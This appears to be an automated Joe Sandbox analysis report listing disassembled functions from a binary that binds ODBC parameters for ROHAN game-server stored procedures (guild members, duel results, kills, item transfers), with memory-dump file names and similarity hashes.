                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004255D0
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00425608
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00425640
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 00425678
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 004256B0
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_InsNGuildMember] (?,?,?,?,?,?,?) } , xrefs: 004254E3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_InsNGuildMember] (?,?,?,?,?,?,?) }
                                                                                      • API String ID: 0-182063655
                                                                                      • Opcode ID: 314f6fdb50f621987b42a650067d3d6b50657188432c27b89023ff95153adfad
                                                                                      • Instruction ID: 581b6eebad972d153b7a590b0a4a8c6a4d2f72a2b8abdc4a493921f2e4d44a7e
                                                                                      • Opcode Fuzzy Hash: 314f6fdb50f621987b42a650067d3d6b50657188432c27b89023ff95153adfad
                                                                                      • Instruction Fuzzy Hash: 6B51FF70A442157BEB649F54CC52FEB7375EB84B18F208388F6196E2C5D9B26D80CB58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_UpdateNGuildMember] (?,?,?,?,?,?,?) } ,000000FD), ref: 004257C2
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00425801
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00425839
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042586E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004258A6
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 004258DE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00425916
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 0042594E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00425986
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_UpdateNGuildMember] (?,?,?,?,?,?,?) } , xrefs: 004257B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_UpdateNGuildMember] (?,?,?,?,?,?,?) }
                                                                                      • API String ID: 0-1929444930
                                                                                      • Opcode ID: 6a6729e8bd2314ad55cbbc5fb2df7a4c2724926d18959fdfde8c508a571fd1c7
                                                                                      • Instruction ID: d863d05d3df7cbea319d4e8dafde626e7a25184862088c92af8065accf351f05
                                                                                      • Opcode Fuzzy Hash: 6a6729e8bd2314ad55cbbc5fb2df7a4c2724926d18959fdfde8c508a571fd1c7
                                                                                      • Instruction Fuzzy Hash: 40510F706442157BEB648B54CC52FEA7335EB84B18F20C288F6296F2C5DDB16E808B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [Rohan_InsertAutoReport] (?,?,?,?,?,?,?)},000000FD), ref: 0043778C
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004377CE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00437803
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0043783B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00437873
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000014,00000000,?,00000015,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004378AB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,00000001,0000000C,00000014), ref: 004378E3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043791B
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000014,00000000,?,00000015,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00437953
                                                                                      Strings
                                                                                      • { ? = CALL [Rohan_InsertAutoReport] (?,?,?,?,?,?,?)}, xrefs: 00437783
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [Rohan_InsertAutoReport] (?,?,?,?,?,?,?)}
                                                                                      • API String ID: 0-3621401546
                                                                                      • Opcode ID: b6202ddb92394b73101ef64a81fa0c6395a5b70dfe3952f3f7e2749b60f8b86c
                                                                                      • Instruction ID: 37fcc42b0638e89595c729f502869e54db7472d61684b33d6f8f0b8d2f6faef3
                                                                                      • Opcode Fuzzy Hash: b6202ddb92394b73101ef64a81fa0c6395a5b70dfe3952f3f7e2749b60f8b86c
                                                                                      • Instruction Fuzzy Hash: 7551C0B1644314BBFB649F58CC53FA97379EB84B18F204288F7186E2C5DEB16984CB58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_ViolenceDuel_InsResult] (?, ?, ?, ?, ?, ?, ?)},000000FD), ref: 004429BD
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004429FF
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00442A34
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E6,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00442A6C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E6,000000FA,00000000), ref: 00442AA4
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E6,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00442ADC
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E6,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E6,000000FA,00000000), ref: 00442B14
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E6,000000FA,00000000), ref: 00442B4C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00442B84
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_ViolenceDuel_InsResult] (?, ?, ?, ?, ?, ?, ?)}, xrefs: 004429B4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_ViolenceDuel_InsResult] (?, ?, ?, ?, ?, ?, ?)}
                                                                                      • API String ID: 0-1139363405
                                                                                      • Opcode ID: fe7d6a39a5c2f476c32ef6f2a318eb44f185764cec676e908abd0382014d96c9
                                                                                      • Instruction ID: 4cd8e7b7dac090c351f13474826d64a22091f0faff80a5aff15813d11bd03296
                                                                                      • Opcode Fuzzy Hash: fe7d6a39a5c2f476c32ef6f2a318eb44f185764cec676e908abd0382014d96c9
                                                                                      • Instruction Fuzzy Hash: 5F51FDB0A442147BEF248B44CC52FE97235EB84B5CF24C698F6297F2D5D6B16AC08B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_SetKill] (?, ?, ?, ?, ?, ?, ?)},000000FD), ref: 0043C3B6
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043C3F5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043C42A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043C462
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043C49A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043C4D2
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043C50A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0043C542
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043C57A
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_SetKill] (?, ?, ?, ?, ?, ?, ?)}, xrefs: 0043C3AD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_SetKill] (?, ?, ?, ?, ?, ?, ?)}
                                                                                      • API String ID: 0-3460291864
                                                                                      • Opcode ID: 9b9685b6ef5eda5ab7ebf064f67145f27606fc5cc50fb22930a7932cff5ae735
                                                                                      • Instruction ID: 1b180745856bb00e216e896e87eedfc0698fe89e0ded7888694d4770cd3c76bf
                                                                                      • Opcode Fuzzy Hash: 9b9685b6ef5eda5ab7ebf064f67145f27606fc5cc50fb22930a7932cff5ae735
                                                                                      • Instruction Fuzzy Hash: FB5130F07802167FEB348B44CC52FBA6334EB81B18F208298F75D6E6C1D9F169819B59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [Rohan_SendItemToRT] (?,?,?,?,?,?,?)},000000FD), ref: 00437596
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004375D5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043760A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00437642
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0043767A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004376B2
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004376ED
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00437728
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00437762
                                                                                      Strings
                                                                                      • { ? = CALL [Rohan_SendItemToRT] (?,?,?,?,?,?,?)}, xrefs: 0043758D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
